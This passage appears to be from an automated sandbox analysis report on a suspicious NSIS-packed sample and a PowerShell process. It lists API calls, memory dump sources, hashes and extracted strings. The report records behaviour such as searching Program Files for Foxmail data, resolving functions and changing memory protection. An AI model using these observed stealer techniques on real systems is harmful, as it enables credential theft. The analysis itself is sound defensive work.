                                      • Opcode Fuzzy Hash: ec01d6e079ce85f28cf112c322313beb68fbf5e6446ad80295b676c2ddc82662
                                      • Instruction Fuzzy Hash: 44F159B1784306DFEB248F6CC841BEA7BA6BF85310F14846AE609CFA91DB35C845C791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q$$^q$$^q
                                      • API String ID: 0-2125118731
                                      • Opcode ID: 9c67093469dd651270432d3803b249583e48524fff74d11d707c7b5118f36fde
                                      • Instruction ID: 47df5b80a96586f2681e65a01c68fd3e9ebd1ec73e788976430ca5e736eec4dc
                                      • Opcode Fuzzy Hash: 9c67093469dd651270432d3803b249583e48524fff74d11d707c7b5118f36fde
                                      • Instruction Fuzzy Hash: 222135F170460AABE734596A8C00BE7B6DA9BC5710F24C82BA60DCBB85DE31E8448361
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q$$^q$$^q
                                      • API String ID: 0-2125118731
                                      • Opcode ID: 72251b889ad6e32eabdd2cc603e9bfbd268bc0eb528230a9b660e96f1c75f741
                                      • Instruction ID: 7de359c32a2cd830ac9c5f4e1a0c0afd8f57db867fd10ef0475e5814e00ccc39
                                      • Opcode Fuzzy Hash: 72251b889ad6e32eabdd2cc603e9bfbd268bc0eb528230a9b660e96f1c75f741
                                      • Instruction Fuzzy Hash: A721E6F691534A8FFF318EA494405EABBB4EFD2220F1540BBDA0C8FA42D7359949C791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q
                                      • API String ID: 0-2049395529
                                      • Opcode ID: 25f9ff3e15ccac80add5927ac0607b8cebbefbe56b5f684ca417ba5440430c1e
                                      • Instruction ID: 726c96c904dd4b57f603333cb796b3356eb639d58d1615b2d97958d9a044f6a3
                                      • Opcode Fuzzy Hash: 25f9ff3e15ccac80add5927ac0607b8cebbefbe56b5f684ca417ba5440430c1e
                                      • Instruction Fuzzy Hash: 3C0184A1A0E3C68FD72B163848641566FB2AFC364072E44DBC189CFB5BCE258C4D8797

                                      Execution Graph

                                      Execution Coverage: 1.8%
                                      Dynamic/Decrypted Code Coverage: 100%
                                      Signature Coverage: 0.5%
                                      Total number of Nodes: 214
                                      Total number of Limit Nodes: 5

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23BC1137
                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1151
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC115C
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC116D
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC117C
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1193
                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 23BC11D0
                                      • FindClose.KERNEL32(00000000), ref: 23BC11DB
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                      • String ID:
                                      • API String ID: 1083526818-0
                                      • Opcode ID: 10dcb6e0d13499153fb75e155b98a31314c135e9cf815a2f05fe8123e3fbc537
                                      • Instruction ID: bef8c72193e8b072179cd697df636e554be70483b319d559d37a61832835bf23
                                      • Opcode Fuzzy Hash: 10dcb6e0d13499153fb75e155b98a31314c135e9cf815a2f05fe8123e3fbc537
                                      • Instruction Fuzzy Hash: 5D216F72A043486FDB30EE649C48F9B7B9CEF98714F040D6ABA98D3190EB74D6058796

                                      Control-flow Graph

                                      APIs
                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23BC1434
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23BC1137
                                        • Part of subcall function 23BC10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1151
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC115C
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC116D
                                        • Part of subcall function 23BC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23BC117C
                                        • Part of subcall function 23BC10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23BC1193
                                        • Part of subcall function 23BC10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 23BC11D0
                                        • Part of subcall function 23BC10F1: FindClose.KERNEL32(00000000), ref: 23BC11DB
                                      • lstrlenW.KERNEL32(?), ref: 23BC14C5
                                      • lstrlenW.KERNEL32(?), ref: 23BC14E0
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC150F
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1521
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC1547
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1553
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC1579
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC1585
                                      • lstrlenW.KERNEL32(?,?), ref: 23BC15AB
                                      • lstrcatW.KERNEL32(00000000), ref: 23BC15B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                      • String ID: )$Foxmail$ProgramFiles
                                      • API String ID: 672098462-2938083778
                                      • Opcode ID: 6fb095b93afe57c6d8f793a0364f9a724d699982dff4795be4c57d2a5f7f5b3c
                                      • Instruction ID: c8c1b675a90d1e2cf4d0f6e0dbd0e0c50b4ea4f2915535afc287d2b7d7c9b22b
                                      • Opcode Fuzzy Hash: 6fb095b93afe57c6d8f793a0364f9a724d699982dff4795be4c57d2a5f7f5b3c
                                      • Instruction Fuzzy Hash: 7D819471A4035CAEDB30DBA19C85FEF7379EF88700F0009E6E508E7191EA715A85CB95

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(23BCC7DD), ref: 23BCC7E6
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                        • Part of subcall function 23BCC803: GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                        • Part of subcall function 23BCC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                        • Part of subcall function 23BCC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: bdb129dfbca63a016b1d5ef881ecd1667fd13fc97533424dc700060becc87243
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: 8201C0009453C16DAA31EE740C01ABB5F98FB3B663B181EF6A250C61B3D9A0850783AA

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                        • Part of subcall function 23BCC7E6: GetModuleHandleA.KERNEL32(23BCC7DD), ref: 23BCC7E6
                                        • Part of subcall function 23BCC7E6: GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                        • Part of subcall function 23BCC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                        • Part of subcall function 23BCC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: 32b3e0493692dbe4286d1abf0834aeea3e44a2de6c3c240e036289eb068c6ba5
                                      • Instruction Fuzzy Hash: 0021B1614482C16EEB31DE744C04AB76FD8EB37262F1D0EE6D140CB173D5A8894783A6

                                      Control-flow Graph

                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,23BCC7F4), ref: 23BCC804
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC816
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23BCC7F4,23BCC7DD), ref: 23BCC82A
                                      • GetModuleHandleA.KERNEL32(?,23BCC7DD), ref: 23BCC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 23BCC860
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProcProtectVirtual$HandleModule
                                      • String ID:
                                      • API String ID: 2152742572-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 3fe1064b2314cb1e33b0b37542a1c881f0b21ced78b4c87074ce2f0d4e3141b4
                                      • Instruction Fuzzy Hash: BDF08C415853C06DFA31EDB41C41AB75B8CEA3B663B181EF6A210C71B3D895850783BA

                                      Control-flow Graph

                                      APIs
                                      • SetErrorMode.KERNEL32 ref: 00403360
                                      • GetVersion.KERNEL32 ref: 00403366
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                      • OleInitialize.OLE32(00000000), ref: 004033DD
                                      • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                      • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                      • GetModuleHandleW.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                      • CharNextW.USER32(00000000,00435000,00000020,?,00000006,00000008,0000000A), ref: 00403448
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 00403582
                                      • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                      • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                      • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                      • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                      • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035D4
                                      • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 004035E8
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                      • ExitProcess.KERNEL32 ref: 004036D4
                                      • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                      • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                      • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                      • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                      • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403729
                                      • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                      • CopyFileW.KERNEL32(00438800,00420EA8,?,?,00000006,00000008,0000000A), ref: 00403797
                                      • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                      • ExitProcess.KERNEL32 ref: 0040387A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 2488574733-3195845224
                                      • Opcode ID: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                      • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                      • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

                                      Control-flow Graph

                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                      • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                      • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                      • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                      • DeleteObject.GDI32(00000000), ref: 00404D22
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                      • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                      • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                      • GlobalFree.KERNEL32(?), ref: 0040505C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051AD
                                      • ShowWindow.USER32(?,00000000), ref: 004051FB
                                      • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                      • ShowWindow.USER32(00000000), ref: 0040520D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 125841dbcfbf331540c9fc092a0589468b1b95d737e95b25a90a5aa385748766
                                      • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                      • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,00437800,74DF3420,00000000), ref: 00405983
                                      • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059CB
                                      • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059EE
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 004059F4
                                      • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,74DF3420,00000000), ref: 00405A04
                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                      • FindClose.KERNEL32(00000000), ref: 00405AB3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2035342205-1173974218
                                      • Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                      • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                      • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                      • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                      APIs
                                      • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,74DF3420,0040597A,?,00437800,74DF3420), ref: 0040659A
                                      • FindClose.KERNEL32(00000000), ref: 004065A6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: 8gB
                                      • API String ID: 2295610775-1733800166
                                      • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                      • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23BC61DA
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23BC61E4
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23BC61F1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 5e9e2830579dfde866567ca68990346ba0279e062272307fae6d92fa766b445a
                                      • Instruction ID: 3ad1919c97c0c9aae1c146cb5191e2273e9adcda40f7ffdb2ddb1cf997ae3bb3
                                      • Opcode Fuzzy Hash: 5e9e2830579dfde866567ca68990346ba0279e062272307fae6d92fa766b445a
                                      • Instruction Fuzzy Hash: C531C474D1121C9BCB21DF24D988B8DBBB8EF18710F5045EAE81CAB260E7349B818F45
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082,23BD2108,0000000C,23BC1F3A,?), ref: 23BC4AD5
                                      • TerminateProcess.KERNEL32(00000000,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082,23BD2108,0000000C,23BC1F3A,?), ref: 23BC4ADC
                                      • ExitProcess.KERNEL32 ref: 23BC4AEE
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 710cbdf17c6f2d3d5359e698cfa050cf2a6d52e2f9a372c0fb5acb9086bd52b8
                                      • Instruction ID: 8761853ecdc53ae7db10a4170ecd50fcb313221606b091500f46e3c4885d3fe6
                                      • Opcode Fuzzy Hash: 710cbdf17c6f2d3d5359e698cfa050cf2a6d52e2f9a372c0fb5acb9086bd52b8
